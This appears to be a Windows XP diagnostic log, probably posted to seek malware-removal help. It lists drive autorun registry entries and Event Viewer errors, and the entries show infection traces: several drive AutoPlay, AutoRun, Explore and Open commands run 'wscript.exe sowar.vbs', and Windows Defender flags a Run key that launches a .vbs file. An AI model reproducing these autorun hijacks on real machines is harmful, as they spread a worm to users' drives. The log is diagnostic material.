HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\\ -> Open -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoPlay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoPlay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoPlay\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoPlay\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoPlay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoPlay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\\Extended ->  -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\AutoRun\command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Explore\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Explore\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Explore\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Open\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Open\Command\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Open\Command\\ -> wscript.exe sowar.vbs -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Open\Default\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{a870de31-2831-11dc-8cfa-00038a000015}\Shell\Open\Default\\ -> 1 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 06 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{d486141a-4b6a-11dd-8dce-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F CF 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F CF CF CF CF CF CF CF CF 5F CF CF CF 5F 5F 5F 5F 5F 5F 5F 5F 5F 5F 00 00 10 00 00 00 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{dbbd3636-c047-11dc-8d49-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea2-8409-11db-8cb2-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea2-8409-11db-8cb2-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea3-8409-11db-8cb2-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea3-8409-11db-8cb2-806d6172696f}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea3-8409-11db-8cb2-806d6172696f}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F CF 5F 5F 5F 5F CF CF 5F 5F 5F CF 01 01 00 5F 5F EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 60 00 00 00 0C 00 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea3-8409-11db-8cb2-806d6172696f}\_Autorun\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea3-8409-11db-8cb2-806d6172696f}\_Autorun\DefaultIcon\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{e02e8ea3-8409-11db-8cb2-806d6172696f}\_Autorun\DefaultIcon\\ -> D:\_setimg\Cdrom.ico [D:\_setimg\Cdrom.ico] -> File not found
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a0-41ed-11dd-8db7-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a0-41ed-11dd-8db7-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a0-41ed-11dd-8db7-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 01 00 01 01 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 06 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\\BaseClass -> Drive -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\\_AutorunStatus -> 01 00 01 00 00 01 00 DF DF 5F DF 5F 5F 5F 5F DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F 5F DF DF DF 5F 5F DF 5F 5F 5F 5F 5F 00 5F 5F 5F 5F 5F CF CF 5F 5F 5F 5F 01 01 00 EE FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF 00 00 10 00 00 08 02 00 00  [binary data] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\shell\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\shell\\ -> None -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\shell\Autoplay\ -> -> 
*MUIVerb* -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\shell\Autoplay\\MUIVerb -> 
@shell32.dll -> %SystemRoot%\system32\shell32.dll -> Microsoft Corporation [Ver = 6.00.2900.5512 (xpsp.080413-2105) | Size = 8461312 bytes | Modified Date = 4/13/2008 5:12:05 PM | Attr =    ]
-8504 ->  -> File not found
*MultiFile Done* -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\shell\Autoplay\DropTarget\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fc0937a1-41ed-11dd-8db7-00038a000015}\shell\Autoplay\DropTarget\\CLSID -> {f26a669a-bcbb-4e37-abf9-7325da15f931} -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{08f68d2d-6bec-11dd-8de3-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{08f68d2d-6bec-11dd-8de3-00038a000015}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{08f68d2d-6bec-11dd-8de3-00038a000015}\\Generation -> 2 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{469152aa-dd6d-11dc-8d5d-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{469152aa-dd6d-11dc-8d5d-00038a000015}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{469152aa-dd6d-11dc-8d5d-00038a000015}\\Generation -> 2 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{469152ab-dd6d-11dc-8d5d-00038a000015}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{469152ab-dd6d-11dc-8d5d-00038a000015}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{469152ab-dd6d-11dc-8d5d-00038a000015}\\Generation -> 3 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e02e8ea2-8409-11db-8cb2-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e02e8ea2-8409-11db-8cb2-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e02e8ea2-8409-11db-8cb2-806d6172696f}\\Generation -> 2 -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e02e8ea3-8409-11db-8cb2-806d6172696f}\ -> -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e02e8ea3-8409-11db-8cb2-806d6172696f}\\Data -> [Binary data over 100 bytes] -> 
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{e02e8ea3-8409-11db-8cb2-806d6172696f}\\Generation -> 2 -> 
< EventViewer Logs > -> Errors and Warnings -> Description
System - Warning - 8/17/2008 7:41:23 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 1223Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Warning - 8/18/2008 3:42:20 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of SAS window
System - Warning - 8/18/2008 3:42:20 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/18/2008 3:42:20 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 1003153 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/18/2008 3:42:25 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of SAS window
System - Error - 8/18/2008 3:42:30 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Windows Update Agent -> Description = 
System - Warning - 8/18/2008 4:41:56 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Win32k -> Description = 
System - Warning - 8/18/2008 6:24:42 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 75C608FC-0B96-4F1B-B9B9-F5DA32B10549User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found iemainHKCUS-1-5-21-3016711891-1204557993-285463850-1006SOFTWAREMicrosoftInternet ExplorerMainStart PageAlert Type 807Detection Type (null)
System - Warning - 8/18/2008 6:24:45 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 873A3D74-3AD5-4C16-9D9C-DD41C6A99EC8User DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found regkeyHKLMSoftwareMicrosoftWindowsCurrentVersionRunSystem RestorerunkeyHKLMSoftwareMicrosoftWindowsCurrentVersionRunSystem RestorefileCWINDOWSSysResvbsAlert Type 807Detection Type (null)
System - Warning - 8/18/2008 7:29:07 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 1223Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Warning - 8/19/2008 6:49:15 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/19/2008 6:49:15 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 1003155 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/19/2008 8:30:40 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/19/2008 8:30:40 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/19/2008 8:30:44 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/19/2008 8:30:44 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 7:56:35 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 7:56:35 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 7:56:39 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 7:56:39 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 7:56:42 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 7:56:42 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 7:58:35 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = WinDefend -> Description = 827 Real-Time Protection agent has detected changes Microsoft recommends you analyze the software that made these changes for potential risks You can use information about how these programs operate to choose whether to allow them to run or remove them from your computer  Allow changes only if you trust the program or the software publisher 827 cant undo changes that you allowFor more information please see the followinghttpgomicrosoftcomfwlinklinkid=74409Scan ID 7CC18307-9495-46C8-8534-D1B2E98CCB9DUser DJDKK5C1Tom JrName UnknownID (null)Severity Not Yet ClassifiedCategory Not Yet ClassifiedPath Found driverATWPKT2Alert Type 807Detection Type (null)
System - Warning - 8/20/2008 9:48:40 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 9:48:40 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 9:48:44 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 9:48:44 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Error - 8/20/2008 9:48:46 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not assigned an address from the network (by the DHCPServer) for the Network Card with network address 0018DE3CF436  The following erroroccurred 1223Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Warning - 8/20/2008 1:22:58 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/20/2008 1:23:04 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 1:23:04 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 1:47:58 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 1:47:58 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 8:26:42 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 8:26:42 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 8:26:45 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Server -> Description = The server could not bind to the transport DeviceNetBTTcpipB2894969-D901-400B-BEAC-4704968BED16
System - Warning - 8/20/2008 8:47:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/20/2008 8:47:37 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = PlugPlayManager -> Description = Timed out sending notification of device interface change to window of IWMSWindow
System - Warning - 8/20/2008 8:47:43 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 8:47:43 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 8:47:46 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
System - Error - 8/20/2008 8:47:46 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer has lost the lease to its IP address 19216823 on theNetwork Card with network address 0018DE3CF436
System - Warning - 8/20/2008 8:47:48 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Server -> Description = The server could not bind to the transport DeviceNetBTTcpipB2894969-D901-400B-BEAC-4704968BED16
System - Error - 8/20/2008 8:47:50 PM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Server -> Description = The server could not bind to the transport DeviceNetbiosSmb because another computer on the network has the same name  The server could not start
System - Warning - 8/21/2008 7:10:25 AM -> Computer Name = DJDKK5C1 - User Name = (blank) - Source = Dhcp -> Description = Your computer was not able to renew its address from the network (from theDHCP Server) for the Network Card with network address 0018DE3CF436  The followingerror occurred 121Your computer will continue to try and obtain an address on its own fromthe network address (DHCP) server
